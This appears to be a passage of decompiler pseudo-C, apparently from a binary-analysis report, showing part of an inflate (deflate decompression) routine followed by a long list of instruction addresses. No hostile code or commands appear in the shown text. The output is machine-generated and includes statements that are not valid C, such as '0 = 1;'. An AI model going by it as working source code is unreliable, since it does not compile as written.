											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
														if(__edi >= __ecx) {
															__eax =  *(__ebp - 8);
															__eax =  *(__ebp - 8) - __edi;
															__eflags = __eax;
														} else {
															__ecx = __ecx - __edi;
															__eax = __ecx;
														}
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L172;
												}
											}
											L158:
											__eax = __esi[0x26e9];
											__edx =  &(__esi[0x6e8]);
											__eflags = __eax - __edx;
											if(__eax == __edx) {
												goto L163;
											}
											L159:
											__edi = __edx;
											__eflags = __edi - __eax;
											if(__edi >= __eax) {
												__ecx = __ecx - __edi;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edi;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L172;
											} else {
												goto L163;
											}
										case 7:
											L173:
											__eflags = __ebx - 7;
											if(__ebx > 7) {
												__ebx = __ebx - 8;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
												_t380 = __ebp - 0x38;
												 *_t380 =  *(__ebp - 0x38) - 1;
												__eflags =  *_t380;
											}
											goto L175;
										case 8:
											L4:
											while(_t425 < 3) {
												if( *(_t448 - 0x34) == 0) {
													goto L182;
												} else {
													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
													_t425 = _t425 + 8;
													continue;
												}
											}
											_t425 = _t425 - 3;
											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
											_t406 =  *(_t448 - 0x40) & 0x00000007;
											asm("sbb ecx, ecx");
											_t408 = _t406 >> 1;
											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
											if(_t408 == 0) {
												L24:
												 *_t446 = 9;
												_t436 = _t425 & 0x00000007;
												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
												_t425 = _t425 - _t436;
												goto L180;
											}
											L6:
											_t411 = _t408 - 1;
											if(_t411 == 0) {
												L13:
												__eflags =  *0x42e3d0;
												if( *0x42e3d0 != 0) {
													L22:
													_t412 =  *0x40a444; // 0x9
													_t446[4] = _t412;
													_t413 =  *0x40a448; // 0x5
													_t446[4] = _t413;
													_t414 =  *0x42d24c; // 0x0
													_t446[5] = _t414;
													_t415 =  *0x42d248; // 0x0
													_t446[6] = _t415;
													L23:
													 *_t446 =  *_t446 & 0x00000000;
													goto L180;
												} else {
													_t26 = _t448 - 8;
													 *_t26 =  *(_t448 - 8) & 0x00000000;
													__eflags =  *_t26;
													_t416 = 0x42d250;
													goto L15;
													L20:
													 *_t416 = _t438;
													_t416 = _t416 + 4;
													__eflags = _t416 - 0x42d6d0;
													if(_t416 < 0x42d6d0) {
														L15:
														__eflags = _t416 - 0x42d48c;
														_t438 = 8;
														if(_t416 > 0x42d48c) {
															__eflags = _t416 - 0x42d650;
															if(_t416 >= 0x42d650) {
																__eflags = _t416 - 0x42d6b0;
																if(_t416 < 0x42d6b0) {
																	_t438 = 7;
																}
															} else {
																_t438 = 9;
															}
														}
														goto L20;
													} else {
														E00407272(0x42d250, 0x120, 0x101, 0x40841c, 0x40845c, 0x42d24c, 0x40a444, 0x42db50, _t448 - 8);
														_push(0x1e);
														_pop(_t440);
														_push(5);
														_pop(_t419);
														memset(0x42d250, _t419, _t440 << 2);
														_t450 = _t450 + 0xc;
														_t442 = 0x42d250 + _t440;
														E00407272(0x42d250, 0x1e, 0, 0x40849c, 0x4084d8, 0x42d248, 0x40a448, 0x42db50, _t448 - 8);
														 *0x42e3d0 =  *0x42e3d0 + 1;
														__eflags =  *0x42e3d0;
														goto L22;
													}
												}
											}
											L7:
											_t423 = _t411 - 1;
											if(_t423 == 0) {
												 *_t446 = 0xb;
												goto L180;
											}
											L8:
											if(_t423 != 1) {
												goto L180;
											}
											goto L9;
										case 9:
											while(1) {
												L27:
												__eflags = __ebx - 0x20;
												if(__ebx >= 0x20) {
													break;
												}
												L25:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L26:
												__eax =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__ecx = __ebx;
												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L28:
											__eax =  *(__ebp - 0x40);
											__ebx = 0;
											__eax =  *(__ebp - 0x40) & 0x0000ffff;
											 *(__ebp - 0x40) = 0;
											__eflags = __eax;
											__esi[1] = __eax;
											if(__eax == 0) {
												goto L53;
											}
											L29:
											_push(0xa);
											_pop(__eax);
											goto L54;
										case 0xa:
											L30:
											__eflags =  *(__ebp - 0x34);
											if( *(__ebp - 0x34) == 0) {
												goto L182;
											}
											L31:
											__eax =  *(__ebp - 0x2c);
											__eflags = __eax;
											if(__eax != 0) {
												L48:
												__eflags = __eax -  *(__ebp - 0x34);
												if(__eax >=  *(__ebp - 0x34)) {
													__eax =  *(__ebp - 0x34);
												}
												__ecx = __esi[1];
												__eflags = __ecx - __eax;
												__edi = __ecx;
												if(__ecx >= __eax) {
													__edi = __eax;
												}
												__eax = E00405DA1( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
												_t80 =  &(__esi[1]);
												 *_t80 = __esi[1] - __edi;
												__eflags =  *_t80;
												if( *_t80 == 0) {
													L53:
													__eax = __esi[0x145];
													L54:
													 *__esi = __eax;
												}
												goto L180;
											}
											L32:
											__ecx = __esi[0x26e8];
											__edx =  *(__ebp - 0x30);
											__eflags = __edx - __ecx;
											if(__edx != __ecx) {
												L38:
												__esi[0x26ea] = __edx;
												__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
												__edx = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edx - __ecx;
												 *(__ebp - 0x30) = __edx;
												if(__edx >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edx;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edx;
													__eax = __ecx - __edx - 1;
												}
												__edi = __esi[0x26e8];
												 *(__ebp - 0x2c) = __eax;
												__eflags = __edx - __edi;
												if(__edx == __edi) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __edx - __ecx;
													if(__eflags != 0) {
														 *(__ebp - 0x30) = __edx;
														if(__eflags >= 0) {
															__edi = __edi - __edx;
															__eflags = __edi;
															__eax = __edi;
														} else {
															__ecx = __ecx - __edx;
															__eax = __ecx;
														}
														 *(__ebp - 0x2c) = __eax;
													}
												}
												__eflags = __eax;
												if(__eax == 0) {
													goto L183;
												} else {
													goto L48;
												}
											}
											L33:
											__eax = __esi[0x26e9];
											__edi =  &(__esi[0x6e8]);
											__eflags = __eax - __edi;
											if(__eax == __edi) {
												goto L38;
											}
											L34:
											__edx = __edi;
											__eflags = __edx - __eax;
											 *(__ebp - 0x30) = __edx;
											if(__edx >= __eax) {
												__ecx = __ecx - __edx;
												__eflags = __ecx;
												__eax = __ecx;
											} else {
												__eax = __eax - __edx;
												__eax = __eax - 1;
											}
											__eflags = __eax;
											 *(__ebp - 0x2c) = __eax;
											if(__eax != 0) {
												goto L48;
											} else {
												goto L38;
											}
										case 0xb:
											goto L56;
										case 0xc:
											L60:
											__esi[1] = __esi[1] >> 0xa;
											__eax = (__esi[1] >> 0xa) + 4;
											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
												goto L68;
											}
											goto L61;
										case 0xd:
											while(1) {
												L93:
												__eax = __esi[1];
												__ecx = __esi[2];
												__edx = __eax;
												__eax = __eax & 0x0000001f;
												__edx = __edx >> 5;
												__eax = __edx + __eax + 0x102;
												__eflags = __esi[2] - __eax;
												if(__esi[2] >= __eax) {
													break;
												}
												L73:
												__eax = __esi[0x143];
												while(1) {
													L76:
													__eflags = __ebx - __eax;
													if(__ebx >= __eax) {
														break;
													}
													L74:
													__eflags =  *(__ebp - 0x34);
													if( *(__ebp - 0x34) == 0) {
														goto L182;
													}
													L75:
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
													__ecx = __ebx;
													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
													__ebx = __ebx + 8;
													__eflags = __ebx;
												}
												L77:
												__eax =  *(0x40a420 + __eax * 2) & 0x0000ffff;
												__eax = __eax &  *(__ebp - 0x40);
												__ecx = __esi[0x144];
												__eax = __esi[0x144] + __eax * 4;
												__edx =  *(__eax + 1) & 0x000000ff;
												__eax =  *(__eax + 2) & 0x0000ffff;
												__eflags = __eax - 0x10;
												 *(__ebp - 0x14) = __eax;
												if(__eax >= 0x10) {
													L79:
													__eflags = __eax - 0x12;
													if(__eax != 0x12) {
														__eax = __eax + 0xfffffff2;
														 *(__ebp - 8) = 3;
													} else {
														_push(7);
														 *(__ebp - 8) = 0xb;
														_pop(__eax);
													}
													while(1) {
														L84:
														__ecx = __eax + __edx;
														__eflags = __ebx - __eax + __edx;
														if(__ebx >= __eax + __edx) {
															break;
														}
														L82:
														__eflags =  *(__ebp - 0x34);
														if( *(__ebp - 0x34) == 0) {
															goto L182;
														}
														L83:
														__ecx =  *(__ebp - 0x38);
														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
														__ecx = __ebx;
														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
														__ebx = __ebx + 8;
														__eflags = __ebx;
													}
													L85:
													__ecx = __edx;
													__ebx = __ebx - __edx;
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													 *(0x40a420 + __eax * 2) & 0x0000ffff =  *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
													__edx =  *(__ebp - 8);
													__ebx = __ebx - __eax;
													__edx =  *(__ebp - 8) + ( *(0x40a420 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
													__ecx = __eax;
													__eax = __esi[1];
													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
													__ecx = __esi[2];
													__eax = __eax >> 5;
													__edi = __eax >> 0x00000005 & 0x0000001f;
													__eax = __eax & 0x0000001f;
													__eax = __edi + __eax + 0x102;
													__edi = __edx + __ecx;
													__eflags = __edx + __ecx - __eax;
													if(__edx + __ecx > __eax) {
														goto L9;
													}
													L86:
													__eflags =  *(__ebp - 0x14) - 0x10;
													if( *(__ebp - 0x14) != 0x10) {
														L89:
														__edi = 0;
														__eflags = 0;
														L90:
														__eax = __esi + 0xc + __ecx * 4;
														do {
															L91:
															 *__eax = __edi;
															__ecx = __ecx + 1;
															__eax = __eax + 4;
															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00407272( &(__esi[3]), __edi, 0x101, 0x40841c, 0x40845c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00407272(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40849c, 0x4084d8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E0040720A( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x00406a9b
0x00406a9b
0x00406a9b
0x00406a9b
0x00406a9b
0x00406a9f
0x00000000
0x00000000
0x00406aa5
0x00406aa5
0x00406aa8
0x00406aab
0x00406ab0
0x00406ab2
0x00406ab5
0x00406ab8
0x00406abb
0x00406abb
0x00406abe
0x00000000
0x00000000
0x00406ac0
0x00406ac0
0x00406ac3
0x00406ac8
0x00406aca
0x00406acd
0x00406ad3
0x00406832
0x00406832
0x00406835
0x0040683b
0x00406841
0x0040684a
0x00406850
0x00406853
0x0040685a
0x0040685f
0x00406865
0x00406870
0x00406870
0x00406ad9
0x00406ad9
0x00406ae3
0x00000000
0x00000000
0x00406ae9
0x00406ae9
0x00406aed
0x00406af0
0x00406af0
0x00406af4
0x00406afa
0x00406afa
0x00406afd
0x00406b00
0x00406b06
0x00000000
0x00000000
0x00406b08
0x00406b2a
0x00406b2a
0x00406b2d
0x00000000
0x00000000
0x00406b0a
0x00406b0e
0x00000000
0x00000000
0x00406b14
0x00406b14
0x00406b17
0x00406b1a
0x00406b1f
0x00406b21
0x00406b24
0x00406b27
0x00406b27
0x00406b2f
0x00406b2f
0x00406b35
0x00406b38
0x00406b3b
0x00406b3b
0x00406b42
0x00406b46
0x00406b4a
0x00406b4d
0x00406b50
0x00406b56
0x00406b5b
0x00000000
0x00000000
0x00406b5d
0x00406b71
0x00406b71
0x00406b75
0x00000000
0x00000000
0x00406b5f
0x00406b62
0x00406b62
0x00406b69
0x00406b6e
0x00406b6e
0x00406b6e
0x00406b77
0x00406b77
0x00406b7a
0x00406b88
0x00406b8e
0x00406b93
0x00406b99
0x00406b9f
0x00406ba5
0x00406bac
0x00406bc0
0x00406bc0
0x0040718f
0x0040718f
0x0040718f
0x00407194
0x00000000
0x00000000
0x004067cc
0x004067cc
0x00000000
0x00406dc7
0x00406dc7
0x00406dcb
0x00406dce
0x00406dd1
0x00406dd4
0x00000000
0x00000000
0x00406dda
0x00406dda
0x00406dff
0x00406dff
0x00406dff
0x00406e01
0x00000000
0x00000000
0x00406ddf
0x00406ddf
0x00406de3
0x00000000
0x00000000
0x00406de9
0x00406de9
0x00406dec
0x00406def
0x00406df2
0x00406df4
0x00406df6
0x00406df9
0x00406dfc
0x00406dfc
0x00406dfc
0x00406e03
0x00406e03
0x00406e0b
0x00406e0e
0x00406e11
0x00406e14
0x00406e18
0x00406e1b
0x00406e1d
0x00406e20
0x00406e22
0x00406e36
0x00406e36
0x00406e39
0x00406e53
0x00406e53
0x00406e56
0x00000000
0x00000000
0x00406e5c
0x00406e5c
0x00406e5f
0x00000000
0x00000000
0x00406e65
0x00406e65
0x00000000
0x00406e65
0x00406e3b
0x00406e3e
0x00406e45
0x00406e48
0x00000000
0x00406e48
0x00406e24
0x00406e28
0x00406e2b
0x00000000
0x00000000
0x00406e70
0x00406e70
0x00406e95
0x00406e95
0x00406e95
0x00406e97
0x00000000
0x00000000
0x00406e75
0x00406e75
0x00406e79
0x00000000
0x00000000
0x00406e7f
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8a
0x00406e8c
0x00406e8f
0x00406e92
0x00406e92
0x00406e92
0x00406e99
0x00406ea1
0x00406ea4
0x00406ea7
0x00406ea9
0x00406eac
0x00406eac
0x00406eae
0x00406eb2
0x00406eb5
0x00406eb8
0x00406ebb
0x00000000
0x00000000
0x00406ec1
0x00406ec1
0x00406ee6
0x00406ee6
0x00406ee6
0x00406ee8
0x00000000
0x00000000
0x00406ec6
0x00406ec6
0x00406eca
0x00000000
0x00000000
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed9
0x00406edb
0x00406edd
0x00406ee0
0x00406ee3
0x00406ee3
0x00406ee3
0x00406eea
0x00406eea
0x00406ef2
0x00406ef5
0x00406ef8
0x00406efb
0x00406eff
0x00406f02
0x00406f04
0x00406f07
0x00406f0a
0x00406f24
0x00406f24
0x00406f27
0x00000000
0x00000000
0x00406f2d
0x00406f2d
0x00406f30
0x00406f37
0x00000000
0x00406f37
0x00406f0c
0x00406f0f
0x00406f16
0x00406f19
0x00000000
0x00000000
0x00406f3f
0x00406f3f
0x00406f64
0x00406f64
0x00406f64
0x00406f66
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x00000000
0x00000000
0x00406f4e
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f59
0x00406f5b
0x00406f5e
0x00406f61
0x00406f61
0x00406f61
0x00406f68
0x00406f70
0x00406f73
0x00406f76
0x00406f78
0x00406f7b
0x00406f7b
0x00406f7d
0x00000000
0x00000000
0x00406f83
0x00406f83
0x00406f86
0x00406f8b
0x00406f8d
0x00406f93
0x00406f95
0x00406faa
0x00406fac
0x00406fac
0x00406f97
0x00406f9d
0x00406f9f
0x00406fa1
0x00406fa1
0x00406fae
0x00406fb2
0x00406fb5
0x00406fbb
0x00406fbb
0x00406fbe
0x00406fbe
0x00406fbe
0x00406fc0
0x00000000
0x00000000
0x00406fc6
0x00406fc6
0x00406fcc
0x00406fce
0x00406ff3
0x00406ff6
0x00406ffc
0x00407001
0x00407007
0x0040700d
0x0040700f
0x00407012
0x0040701b
0x00407021
0x00407021
0x00407014
0x00407016
0x00407018
0x00407018
0x00407023
0x00407029
0x0040702b
0x0040702e
0x00407030
0x00407036
0x00407038
0x0040703a
0x0040703c
0x0040703e
0x00407041
0x0040704a
0x0040704d
0x0040704d
0x00407043
0x00407043
0x00407046
0x00407046
0x00407041
0x00407038
0x0040704f
0x00407051
0x00000000
0x00000000
0x00000000
0x00000000
0x00407051
0x00406fd0
0x00406fd0
0x00406fd6
0x00406fdc
0x00406fde
0x00000000
0x00000000
0x00406fe0
0x00406fe0
0x00406fe2
0x00406fe4
0x00406fed
0x00406fed
0x00406fe6
0x00406fe6
0x00406fe9
0x00406fe9
0x00406fef
0x00406ff1
0x00000000
0x00000000
0x00407057
0x00407057
0x0040705c
0x0040705e
0x0040705f
0x00407060
0x00407061
0x00407067
0x0040706a
0x0040706d
0x00407070
0x00407072
0x00407078
0x00407078
0x0040707b
0x0040707b
0x0040707b
0x0040707b
0x00407084
0x00000000
0x00000000
0x00407089
0x00407089
0x0040708c
0x0040708f
0x00407091
0x00407128
0x00407128
0x0040712b
0x0040712d
0x0040712e
0x0040712f
0x00407132
0x00000000
0x00407132
0x00407097
0x00407097
0x0040709d
0x0040709f
0x004070c4
0x004070c7
0x004070cd
0x004070d2
0x004070d8
0x004070de
0x004070e0
0x004070e3
0x004070ec
0x004070f2
0x004070f2
0x004070e5
0x004070e7
0x004070e9
0x004070e9
0x004070f4
0x004070fa
0x004070fc
0x004070ff
0x00407101
0x00407107
0x00407109
0x0040710b
0x0040710d
